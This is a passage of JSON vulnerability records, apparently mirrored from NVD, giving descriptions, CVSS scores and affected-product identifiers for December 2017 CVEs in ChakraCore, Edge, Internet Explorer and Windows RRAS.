"2022-03-23T12:42:57", "description": "ChakraCore and Microsoft Edge in Windows 10 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11914", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:00:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11914", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11914", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:58", "description": "ChakraCore allows an attacker to execute arbitrary code in the context of the current user, due to how the ChakraCore scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11916", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T19:54:00", "cpe": [], "id": "CVE-2017-11916", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11916", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": []}, {"lastseen": "2022-03-23T12:43:00", "description": "ChakraCore and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11918", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2019-04-25T19:01:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11918", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11918", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:42", "description": "ChakraCore and Windows 10 1709 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11908", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T20:27:00", "cpe": ["cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11908", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11908", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:53", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Internet Explorer and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to gain the same user rights as the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11913, CVE-2017-11914, CVE-2017-11916, CVE-2017-11918, and CVE-2017-11930.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11912", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11918", "CVE-2017-11930"], "modified": "2017-12-21T20:09:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11912", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11912", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:09", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to execute arbitrary code in the context of the current user, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-11886, CVE-2017-11889, CVE-2017-11890, CVE-2017-11893, CVE-2017-11894, CVE-2017-11895, CVE-2017-11901, CVE-2017-11903, CVE-2017-11905, CVE-2017-11905, CVE-2017-11907, CVE-2017-11908, CVE-2017-11909, CVE-2017-11910, CVE-2017-11911, CVE-2017-11912, CVE-2017-11913, CVE-2017-11914, and CVE-2017-11916.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11930", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886", "CVE-2017-11889", "CVE-2017-11890", "CVE-2017-11893", "CVE-2017-11894", "CVE-2017-11895", "CVE-2017-11901", "CVE-2017-11903", "CVE-2017-11905", "CVE-2017-11907", "CVE-2017-11908", "CVE-2017-11909", "CVE-2017-11910", "CVE-2017-11911", "CVE-2017-11912", "CVE-2017-11913", "CVE-2017-11914", "CVE-2017-11916", "CVE-2017-11930"], "modified": "2017-12-21T20:08:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11"], "id": "CVE-2017-11930", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11930", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:15", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 SP2 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handle objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11906 and CVE-2017-11919.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11887", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887", "CVE-2017-11906", "CVE-2017-11919"], "modified": "2017-12-26T14:55:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11887", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11887", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:38", "description": "Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 and R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 and R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how Internet Explorer handles objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11919.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11906", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887", "CVE-2017-11906", "CVE-2017-11919"], "modified": "2017-12-26T14:56:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:internet_explorer:9", "cpe:/a:microsoft:internet_explorer:10"], "id": "CVE-2017-11906", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11906", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:internet_explorer:9:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:10:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:43:16", "description": "ChakraCore, and Internet Explorer in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8.1 and Windows RT 8.1, Windows Server 2012 R2, and Windows 10 Gold, 1511, 1607, 1703, 1709, Windows Server 2016, and Microsoft Edge in Windows 10 Gold, 1511, 1607, 1703, 1709, and Windows Server 2016 allows an attacker to obtain information to further compromise the user's system, due to how the scripting engine handles objects in memory, aka \"Scripting Engine Information Disclosure Vulnerability\". This CVE ID is unique from CVE-2017-11887 and CVE-2017-11906.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11919", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11887", "CVE-2017-11906", "CVE-2017-11919"], "modified": "2017-12-26T14:58:00", "cpe": ["cpe:/a:microsoft:internet_explorer:11", "cpe:/a:microsoft:edge:-"], "id": "CVE-2017-11919", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11919", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:microsoft:edge:-:*:*:*:*:*:*:*", "cpe:2.3:a:microsoft:internet_explorer:11:*:*:*:*:*:*:*"]}, {"lastseen": "2022-05-23T19:17:33", "description": "Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow an information vulnerability due to the way the Windows its:// protocol handler determines the zone of a request, aka \"Microsoft Windows Information Disclosure Vulnerability\".", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11927", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2022-05-23T17:29:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:*", "cpe:/o:microsoft:windows_rt_8.1:*", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server:1709"], "id": "CVE-2017-11927", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11927", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:42:11", "description": "Windows 7 SP1, Windows 8.1 and RT 8.1, Windows Server 2008 SP2 and R2 SP1, Windows Server 2012 and R2, Windows 10 Gold, 1511, 1607, 1703 and 1709, Windows Server 2016 and Windows Server, version 1709 allow a remote code execution vulnerability due to the way the Routing and Remote Access service handles requests, aka \"Windows RRAS Service Remote Code Execution Vulnerability\".", "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 6.6, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-12-12T21:29:00", "type": "cve", "title": "CVE-2017-11885", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11885"], "modified": "2019-04-26T15:18:00", "cpe": ["cpe:/o:microsoft:windows_server_2016:1709", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_10:1511", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:1703", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_8.1:*", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2012:-"], "id": "CVE-2017-11885", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11885", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_10:1703:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:itanium:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1511:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:*:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", 